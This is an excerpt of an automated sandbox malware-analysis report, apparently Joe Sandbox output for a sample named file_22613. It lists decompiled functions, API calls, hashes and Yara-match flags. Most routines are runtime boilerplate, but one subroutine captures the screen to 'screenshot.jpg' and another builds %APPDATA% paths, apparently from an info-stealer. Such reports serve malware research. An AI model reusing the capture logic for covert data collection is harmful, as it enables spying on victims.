                                                                                0x00408949
                                                                                0x00408916
                                                                                0x00408924
                                                                                0x00408929
                                                                                0x0040892d
                                                                                0x00408930
                                                                                0x00408932
                                                                                0x00408932
                                                                                0x00408937
                                                                                0x00408942
                                                                                0x00408948
                                                                                0x00408953
                                                                                0x0040895d

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 004088E2
                                                                                • _strtok.LIBCMT ref: 004088F6
                                                                                  • Part of subcall function 0041F4CD: __getptd.LIBCMT ref: 0041F4EB
                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00440C98,?,00000000,00000024,00412CED,?), ref: 00408937
                                                                                • _strtok.LIBCMT ref: 00408942
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strtok$CreateDirectoryH_prolog3___getptd
                                                                                • String ID:
                                                                                • API String ID: 2807274917-0
                                                                                • Opcode ID: 71c84a387ab439495ae75e9d2ecf432e9ff0be3bc9304d4ad22ca9729fbe213a
                                                                                • Instruction ID: 577d3d8a7166b1bdf689bfbfa01224d28191236895ddc7b3ad4adf32f5bc5b87
                                                                                • Opcode Fuzzy Hash: 71c84a387ab439495ae75e9d2ecf432e9ff0be3bc9304d4ad22ca9729fbe213a
                                                                                • Instruction Fuzzy Hash: 970140B1D04209AEDF14EBE5E896DEE7778EB18304F50942FF210B7181DA7895448B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00431E0B() {
                                                                                				WCHAR* _t2;
                                                                                				void* _t15;
                                                                                				WCHAR* _t17;
                                                                                
                                                                                				_t2 = GetEnvironmentStringsW();
                                                                                				_t17 = _t2;
                                                                                				if(_t17 != 0) {
                                                                                					if( *_t17 != 0) {
                                                                                						goto L3;
                                                                                						do {
                                                                                							do {
                                                                                								L3:
                                                                                								_t2 =  &(_t2[1]);
                                                                                							} while ( *_t2 != 0);
                                                                                							_t2 =  &(_t2[1]);
                                                                                						} while ( *_t2 != 0);
                                                                                					}
                                                                                					_t1 = _t2 - _t17 + 2; // -2
                                                                                					_t10 = _t1;
                                                                                					_t15 = E00422FFA(_t1);
                                                                                					if(_t15 != 0) {
                                                                                						E00421230(_t15, _t17, _t10);
                                                                                					}
                                                                                					FreeEnvironmentStringsW(_t17);
                                                                                					return _t15;
                                                                                				} else {
                                                                                					return 0;
                                                                                				}
                                                                                			}






                                                                                0x00431e0e
                                                                                0x00431e14
                                                                                0x00431e1a
                                                                                0x00431e23
                                                                                0x00000000
                                                                                0x00431e25
                                                                                0x00431e25
                                                                                0x00431e25
                                                                                0x00431e25
                                                                                0x00431e28
                                                                                0x00431e2d
                                                                                0x00431e30
                                                                                0x00431e25
                                                                                0x00431e38
                                                                                0x00431e38
                                                                                0x00431e42
                                                                                0x00431e47
                                                                                0x00431e59
                                                                                0x00431e5e
                                                                                0x00431e4a
                                                                                0x00431e55
                                                                                0x00431e1c
                                                                                0x00431e1f
                                                                                0x00431e1f

                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(00000000,0042ACD7,00000000,00000000,76C85970,?,00420E43,00413E0B,00000000,?,?,?,?,?,?,00000000), ref: 00431E0E
                                                                                • __malloc_crt.LIBCMT ref: 00431E3D
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,00000000,014A10F8), ref: 00431E4A
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                • String ID:
                                                                                • API String ID: 237123855-0
                                                                                • Opcode ID: 5d716967c9fc2f86459c5dbb12a428be10c6206b913e96ae9255d42bf7896062
                                                                                • Instruction ID: d2749e336d669b7e4457df94466566cb2baf6b7ae9cf6cc8033da602753a596e
                                                                                • Opcode Fuzzy Hash: 5d716967c9fc2f86459c5dbb12a428be10c6206b913e96ae9255d42bf7896062
                                                                                • Instruction Fuzzy Hash: A3F02E375041106ACF317734BD4789B5328DEDD394716541BF801C3360F9198D4386BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __lock.LIBCMT ref: 00C717B6
                                                                                  • Part of subcall function 00C73FBC: __mtinitlocknum.LIBCMT ref: 00C73FD2
                                                                                  • Part of subcall function 00C73FBC: __amsg_exit.LIBCMT ref: 00C73FDE
                                                                                  • Part of subcall function 00C73FBC: EnterCriticalSection.KERNEL32(00C71E80,00C71E80,?,00C75AF0,00000004,00DAAC10,0000000C,00C78EA1,00000000,00C71E8F,00000000,00000000,00000000,?,00C7718C,00000001), ref: 00C73FE6
                                                                                • ___sbh_heap_check.LIBCMT ref: 00C717C0
                                                                                • HeapValidate.KERNEL32(00000000,00000000,00DAAAB0,0000000C,00C6FC85,00000000,?), ref: 00C717E2
                                                                                • GetLastError.KERNEL32 ref: 00C717EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterErrorHeapLastSectionValidate___sbh_heap_check__amsg_exit__lock__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 2643099450-0
                                                                                • Opcode ID: 72b0e5a69e6a713d8872eb2a5681005e3a946c9fea445d594061fa9a0197288f
                                                                                • Instruction ID: 5f661d76da6eafbe06ac23befd16c12d5b57f30215fcfebd65ca2e2fffd95d3d
                                                                                • Opcode Fuzzy Hash: 72b0e5a69e6a713d8872eb2a5681005e3a946c9fea445d594061fa9a0197288f
                                                                                • Instruction Fuzzy Hash: 3601D130940355DADB207FA99C06BAD76A0AB01772F24C215F4689A1E0C7784642EF51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004171D3(char* __eax, char* _a4) {
                                                                                				intOrPtr* _v0;
                                                                                				intOrPtr* _t10;
                                                                                				char* _t14;
                                                                                				CHAR* _t15;
                                                                                				intOrPtr _t16;
                                                                                				int _t19;
                                                                                				void* _t20;
                                                                                				CHAR* _t22;
                                                                                
                                                                                				_t22 = __eax;
                                                                                				_t14 = StrStrA(__eax, _a4);
                                                                                				if(_t14 != 0) {
                                                                                					_t19 = _t14 - _t22;
                                                                                					_t22 = 0x44a450;
                                                                                					lstrcpynA(0x44a450, 0x44a450, _t19);
                                                                                					_t10 = _v0;
                                                                                					_t3 =  &(0x44a450[_t19]); // 0x44a450
                                                                                					_t15 = _t3;
                                                                                					 *_t15 = 0;
                                                                                					_t20 = _t10 + 1;
                                                                                					do {
                                                                                						_t16 =  *_t10;
                                                                                						_t10 = _t10 + 1;
                                                                                					} while (_t16 != 0);
                                                                                					wsprintfA(_t15, "%s%s", _a4, _t10 - _t20 + _t14);
                                                                                				}
                                                                                				return _t22;
                                                                                			}











                                                                                0x004171d9
                                                                                0x004171e2
                                                                                0x004171e6
                                                                                0x004171eb
                                                                                0x004171ef
                                                                                0x004171f5
                                                                                0x004171fb
                                                                                0x004171ff
                                                                                0x004171ff
                                                                                0x00417205
                                                                                0x00417208
                                                                                0x0041720b
                                                                                0x0041720b
                                                                                0x0041720d
                                                                                0x0041720e
                                                                                0x00417221
                                                                                0x0041722a
                                                                                0x0041722f

                                                                                APIs
                                                                                • StrStrA.SHLWAPI(?,00409ABC,00000104,00000000,00409ABC,%APPDATA%,00000000), ref: 004171DC
                                                                                • lstrcpynA.KERNEL32(0044A450,?,00000000,00000000), ref: 004171F5
                                                                                • wsprintfA.USER32 ref: 00417221
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpynwsprintf
                                                                                • String ID: %s%s
                                                                                • API String ID: 1799455324-3252725368
                                                                                • Opcode ID: 432519dee97816f7c9a1de608d8b34805c578aef681daadeccc2c5a4f0f4145e
                                                                                • Instruction ID: ef5c4c7bbc0261b9d93d7aad86dca49cd2d2d625cfccfd17ad4a467fd7bb5884
                                                                                • Opcode Fuzzy Hash: 432519dee97816f7c9a1de608d8b34805c578aef681daadeccc2c5a4f0f4145e
                                                                                • Instruction Fuzzy Hash: F2F02B352002126FE3114F288C8CD9BBFA9EF86254B040466FA40C3310CB76D829839A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 31%
                                                                                			E0041786A(void* __ecx, CHAR* _a4) {
                                                                                				void* _v8;
                                                                                				char _v12;
                                                                                				char* _t6;
                                                                                				intOrPtr _t8;
                                                                                				void* _t14;
                                                                                
                                                                                				_t14 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
                                                                                				if(_t14 != 0xffffffff) {
                                                                                					_t6 =  &_v12;
                                                                                					__imp__GetFileSizeEx(_t14, _t6);
                                                                                					_push(_t14);
                                                                                					if(_t6 != 0) {
                                                                                						CloseHandle();
                                                                                						_t8 = _v12;
                                                                                					} else {
                                                                                						CloseHandle();
                                                                                						goto L1;
                                                                                					}
                                                                                				} else {
                                                                                					L1:
                                                                                					_t8 = 0;
                                                                                				}
                                                                                				return _t8;
                                                                                			}








                                                                                0x0041788b
                                                                                0x00417890
                                                                                0x00417898
                                                                                0x0041789d
                                                                                0x004178a3
                                                                                0x004178a6
                                                                                0x004178b0
                                                                                0x004178b6
                                                                                0x004178a8
                                                                                0x004178a8
                                                                                0x00000000
                                                                                0x004178a8
                                                                                0x00417892
                                                                                0x00417892
                                                                                0x00417892
                                                                                0x00417894
                                                                                0x004178be

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00409882,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00409882,?), ref: 00417885
                                                                                • GetFileSizeEx.KERNEL32(00000000,00409882,?,?,?,00409882,?), ref: 0041789D
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00409882,?), ref: 004178A8
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00409882,?), ref: 004178B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileHandle$CreateSize
                                                                                • String ID:
                                                                                • API String ID: 4148174661-0
                                                                                • Opcode ID: 698f352844b2797ff7410bdc639b1352edd1824ad24c8aafbb85ec6769950ff7
                                                                                • Instruction ID: 6c9d8c31a0d3b5022869ef95340bd8bcf673287835e153943df70c3ee11a0417
                                                                                • Opcode Fuzzy Hash: 698f352844b2797ff7410bdc639b1352edd1824ad24c8aafbb85ec6769950ff7
                                                                                • Instruction Fuzzy Hash: 14F08235644215FBE724AB60DC0DFDA7A7CEB45760F208125FE01B21D0E7B46A81C6AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 31%
                                                                                			E004178C1(void* __ecx, WCHAR* _a4) {
                                                                                				void* _v8;
                                                                                				char _v12;
                                                                                				char* _t6;
                                                                                				intOrPtr _t8;
                                                                                				void* _t14;
                                                                                
                                                                                				_t14 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
                                                                                				if(_t14 != 0xffffffff) {
                                                                                					_t6 =  &_v12;
                                                                                					__imp__GetFileSizeEx(_t14, _t6);
                                                                                					_push(_t14);
                                                                                					if(_t6 != 0) {
                                                                                						CloseHandle();
                                                                                						_t8 = _v12;
                                                                                					} else {
                                                                                						CloseHandle();
                                                                                						goto L1;
                                                                                					}
                                                                                				} else {
                                                                                					L1:
                                                                                					_t8 = 0;
                                                                                				}
                                                                                				return _t8;
                                                                                			}








                                                                                0x004178e2
                                                                                0x004178e7
                                                                                0x004178ef
                                                                                0x004178f4
                                                                                0x004178fa
                                                                                0x004178fd
                                                                                0x00417907
                                                                                0x0041790d
                                                                                0x004178ff
                                                                                0x004178ff
                                                                                0x00000000
                                                                                0x004178ff
                                                                                0x004178e9
                                                                                0x004178e9
                                                                                0x004178e9
                                                                                0x004178eb
                                                                                0x00417915

                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,004086DD,?,00000001), ref: 004178DC
                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004086DD,?,00000001), ref: 004178F4
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,004086DD,?,00000001), ref: 004178FF
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,004086DD,?,00000001), ref: 00417907
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileHandle$CreateSize
                                                                                • String ID:
                                                                                • API String ID: 4148174661-0
                                                                                • Opcode ID: f8a1c995e8f40240364e52f70c7ca4c262f4a0b4571d2587a88581e847a714b6
                                                                                • Instruction ID: 4a6acde8d417ce3ed1d252b1c6b4b85539ff2511fc7dbcf8801c22f2a3f09152
                                                                                • Opcode Fuzzy Hash: f8a1c995e8f40240364e52f70c7ca4c262f4a0b4571d2587a88581e847a714b6
                                                                                • Instruction Fuzzy Hash: 07F08275644214BBEB249B60DC09FDF7ABCEB05760F204121FE01A21D0EBB46B51966D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 00C723CC
                                                                                  • Part of subcall function 00C771DA: __getptd_noexit.LIBCMT ref: 00C771DD
                                                                                  • Part of subcall function 00C771DA: __amsg_exit.LIBCMT ref: 00C771EA
                                                                                • __getptd.LIBCMT ref: 00C723E3
                                                                                • __amsg_exit.LIBCMT ref: 00C723F1
                                                                                • __lock.LIBCMT ref: 00C72401
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                • String ID:
                                                                                • API String ID: 3521780317-0
                                                                                • Opcode ID: 575125beede718350792d7a922c35859f1894dce783ae20386863a3b081dfee2
                                                                                • Instruction ID: 2d4c9a01219c32c293c6145f0e82961ee3883ccc71b821e9c0e22122055af71a
                                                                                • Opcode Fuzzy Hash: 575125beede718350792d7a922c35859f1894dce783ae20386863a3b081dfee2
                                                                                • Instruction Fuzzy Hash: 18F06D32904704CBD720BB749802B5D72A4AF00721F10C249E8A8973E1DB78AA05EB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 50%
                                                                                			E00417D56() {
                                                                                				char _v8;
                                                                                				int _v12;
                                                                                				int _v16;
                                                                                				int _v20;
                                                                                				int _v24;
                                                                                				void* __ebx;
                                                                                				int _t10;
                                                                                				void* _t12;
                                                                                
                                                                                				_v24 = 1;
                                                                                				_v20 = 0;
                                                                                				_v16 = 0;
                                                                                				_v12 = 0;
                                                                                				__imp__GdiplusStartup( &_v8,  &_v24, 0);
                                                                                				_t10 = GetSystemMetrics(0);
                                                                                				_t12 = E00417C86(GetSystemMetrics(1), _t10);
                                                                                				__imp__GdiplusShutdown(_v8);
                                                                                				return _t12;
                                                                                			}











                                                                                0x00417d69
                                                                                0x00417d70
                                                                                0x00417d73
                                                                                0x00417d76
                                                                                0x00417d79
                                                                                0x00417d80
                                                                                0x00417d94
                                                                                0x00417d9c
                                                                                0x00417da5

                                                                                APIs
                                                                                • GdiplusStartup.GDIPLUS(?,?,00000000,?,00000000), ref: 00417D79
                                                                                • GetSystemMetrics.USER32(00000000), ref: 00417D80
                                                                                • GetSystemMetrics.USER32(00000001), ref: 00417D8A
                                                                                  • Part of subcall function 00417C86: CreateCompatibleDC.GDI32(00000000), ref: 00417C9D
                                                                                  • Part of subcall function 00417C86: GetDC.USER32(00000000), ref: 00417CA9
                                                                                  • Part of subcall function 00417C86: CreateCompatibleBitmap.GDI32(00000000), ref: 00417CB0
                                                                                  • Part of subcall function 00417C86: SelectObject.GDI32(?,00000000), ref: 00417CBD
                                                                                  • Part of subcall function 00417C86: GetDC.USER32(00000000), ref: 00417CCB
                                                                                  • Part of subcall function 00417C86: BitBlt.GDI32(?,00000000,00000000,00000000,00000000,00000000), ref: 00417CD9
                                                                                  • Part of subcall function 00417C86: GdipAlloc.GDIPLUS(00000010,?,?,?,?,?,?,00417D99), ref: 00417CE1
                                                                                  • Part of subcall function 00417C86: GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?,?,?,?,?,?,?,00417D99), ref: 00417CFE
                                                                                  • Part of subcall function 00417C86: GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000,?,?,?,?,?,?,00417D99), ref: 00417D28
                                                                                  • Part of subcall function 00417C86: DeleteObject.GDI32(?), ref: 00417D40
                                                                                • GdiplusShutdown.GDIPLUS(?), ref: 00417D9C
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateGdip$BitmapCompatibleGdiplusMetricsObjectSystem$AllocDeleteFileFromImageSaveSelectShutdownStartup
                                                                                • String ID:
                                                                                • API String ID: 2538933268-0
                                                                                • Opcode ID: 49702849efac5d4f4e4b2176bcbdff8bd81fb89eb20b0933485709c1d1af3823
                                                                                • Instruction ID: 1f9ffcf39aaceb940411d9bfa7d7d9f7a6648eb9fc6deacf9e725d6300546b30
                                                                                • Opcode Fuzzy Hash: 49702849efac5d4f4e4b2176bcbdff8bd81fb89eb20b0933485709c1d1af3823
                                                                                • Instruction Fuzzy Hash: 35F012B6D41228ABCB01AFE49D499CEBBBCEB08745F1001A6F911E2251D7B55B008BE5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E00414F20(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t21;
                                                                                				intOrPtr* _t23;
                                                                                				intOrPtr* _t25;
                                                                                				void* _t26;
                                                                                				void* _t27;
                                                                                
                                                                                				_t27 = __eflags;
                                                                                				_t22 = __edi;
                                                                                				_t17 = __ebx;
                                                                                				_push(0);
                                                                                				E00421975(E00435C5D, __ebx, __edi, __esi);
                                                                                				_t25 =  *((intOrPtr*)(_t26 + 8));
                                                                                				 *_t25 = 0x441164;
                                                                                				E0041D5C1(_t25 + 4, __edi, _t27);
                                                                                				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                                                                                				_t23 = E0041EB16(__ebx, _t21, _t22, _t25, _t27, 4);
                                                                                				_t28 = _t23;
                                                                                				if(_t23 == 0) {
                                                                                					_t23 = 0;
                                                                                					__eflags = 0;
                                                                                				} else {
                                                                                					 *_t23 = E0041D9C9(_t17, _t23, _t25, _t28);
                                                                                					E0040F13E(E0041D788());
                                                                                				}
                                                                                				 *((intOrPtr*)(_t25 + 0x38)) = _t23;
                                                                                				E00414F89(_t25);
                                                                                				return E00421A4D(_t25);
                                                                                			}








                                                                                0x00414f20
                                                                                0x00414f20
                                                                                0x00414f20
                                                                                0x00414f20
                                                                                0x00414f27
                                                                                0x00414f2c
                                                                                0x00414f32
                                                                                0x00414f38
                                                                                0x00414f3d
                                                                                0x00414f48
                                                                                0x00414f4b
                                                                                0x00414f4d
                                                                                0x00414f64
                                                                                0x00414f64
                                                                                0x00414f4f
                                                                                0x00414f54
                                                                                0x00414f5d
                                                                                0x00414f5d
                                                                                0x00414f68
                                                                                0x00414f6b
                                                                                0x00414f77

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00414F27
                                                                                • std::_Mutex::_Mutex.LIBCPMT ref: 00414F38
                                                                                  • Part of subcall function 0041EB16: _malloc.LIBCMT ref: 0041EB30
                                                                                • std::locale::_Init.LIBCPMT ref: 00414F4F
                                                                                  • Part of subcall function 0041D9C9: __EH_prolog3.LIBCMT ref: 0041D9D0
                                                                                  • Part of subcall function 0041D9C9: std::_Lockit::_Lockit.LIBCPMT ref: 0041D9E6
                                                                                  • Part of subcall function 0041D9C9: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0041DA08
                                                                                  • Part of subcall function 0041D9C9: std::locale::_Setgloballocale.LIBCPMT ref: 0041DA12
                                                                                  • Part of subcall function 0041D9C9: _Yarn.LIBCPMT ref: 0041DA28
                                                                                  • Part of subcall function 0041D9C9: std::locale::facet::_Incref.LIBCPMT ref: 0041DA35
                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 00414F5D
                                                                                  • Part of subcall function 0040F13E: std::_Lockit::_Lockit.LIBCPMT ref: 0040F14A
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_std::locale::_$H_prolog3IncrefLockitLockit::_std::locale::facet::_$InitLocimpLocimp::_MutexMutex::_SetgloballocaleYarn_malloc
                                                                                • String ID:
                                                                                • API String ID: 3596770912-0
                                                                                • Opcode ID: 61c5aea4bcfa2bd0f00cdd6745375330b01388331214941ca36b9c87dc93c8e6
                                                                                • Instruction ID: 9851b0f838591f8a9e8e56e7ff5b8229f0e4ffa2096a1d1dd3cabf10c950164d
                                                                                • Opcode Fuzzy Hash: 61c5aea4bcfa2bd0f00cdd6745375330b01388331214941ca36b9c87dc93c8e6
                                                                                • Instruction Fuzzy Hash: 7EF0EDB1A00302CBD710BBB7A40279EA2D1AFA0718F20042FB1418B791DF3CA982874D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00403C13(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t13;
                                                                                				intOrPtr* _t17;
                                                                                				intOrPtr* _t20;
                                                                                				intOrPtr* _t23;
                                                                                				intOrPtr _t25;
                                                                                				intOrPtr* _t27;
                                                                                				intOrPtr _t31;
                                                                                				intOrPtr* _t34;
                                                                                				void* _t35;
                                                                                
                                                                                				_t23 = _a4;
                                                                                				_t13 =  *((intOrPtr*)(_t23 + 0x10));
                                                                                				_t34 = __ecx;
                                                                                				_t25 = _a8;
                                                                                				if(_t13 < _t25) {
                                                                                					_t13 = E0041D406("invalid string position");
                                                                                				}
                                                                                				_t31 = _t13 - _t25;
                                                                                				if(_a12 < _t31) {
                                                                                					_t31 = _a12;
                                                                                				}
                                                                                				if(_t34 != _t23) {
                                                                                					if(E00403CAC(_t23, _t34, _t31, _t35, _t31, 0) != 0) {
                                                                                						if( *((intOrPtr*)(_t23 + 0x14)) < 0x10) {
                                                                                							_t17 = _t23;
                                                                                						} else {
                                                                                							_t17 =  *_t23;
                                                                                						}
                                                                                						if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
                                                                                							_t27 = _t34;
                                                                                						} else {
                                                                                							_t27 =  *_t34;
                                                                                						}
                                                                                						E00421230(_t27, _t17 + _a8, _t31);
                                                                                						 *((intOrPtr*)(_t34 + 0x10)) = _t31;
                                                                                						if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
                                                                                							_t20 = _t34;
                                                                                						} else {
                                                                                							_t20 =  *_t34;
                                                                                						}
                                                                                						 *((char*)(_t20 + _t31)) = 0;
                                                                                					}
                                                                                				} else {
                                                                                					E00403EAE(_t34, _t31 + _t25, 0xffffffff);
                                                                                					E00403EAE(_t34, 0, _a8);
                                                                                				}
                                                                                				return _t34;
                                                                                			}















                                                                                0x00403c17
                                                                                0x00403c1a
                                                                                0x00403c1e
                                                                                0x00403c20
                                                                                0x00403c26
                                                                                0x00403c2d
                                                                                0x00403c2d
                                                                                0x00403c34
                                                                                0x00403c39
                                                                                0x00403c3b
                                                                                0x00403c3b
                                                                                0x00403c40
                                                                                0x00403c68
                                                                                0x00403c6e
                                                                                0x00403c74
                                                                                0x00403c70
                                                                                0x00403c70
                                                                                0x00403c70
                                                                                0x00403c7a
                                                                                0x00403c80
                                                                                0x00403c7c
                                                                                0x00403c7c
                                                                                0x00403c7c
                                                                                0x00403c88
                                                                                0x00403c94
                                                                                0x00403c97
                                                                                0x00403c9d
                                                                                0x00403c99
                                                                                0x00403c99
                                                                                0x00403c99
                                                                                0x00403c9f
                                                                                0x00403c9f
                                                                                0x00403c42
                                                                                0x00403c49
                                                                                0x00403c55
                                                                                0x00403c55
                                                                                0x00403ca9

                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00403C2D
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D41B
                                                                                  • Part of subcall function 0041D406: __CxxThrowException@8.LIBCMT ref: 0041D430
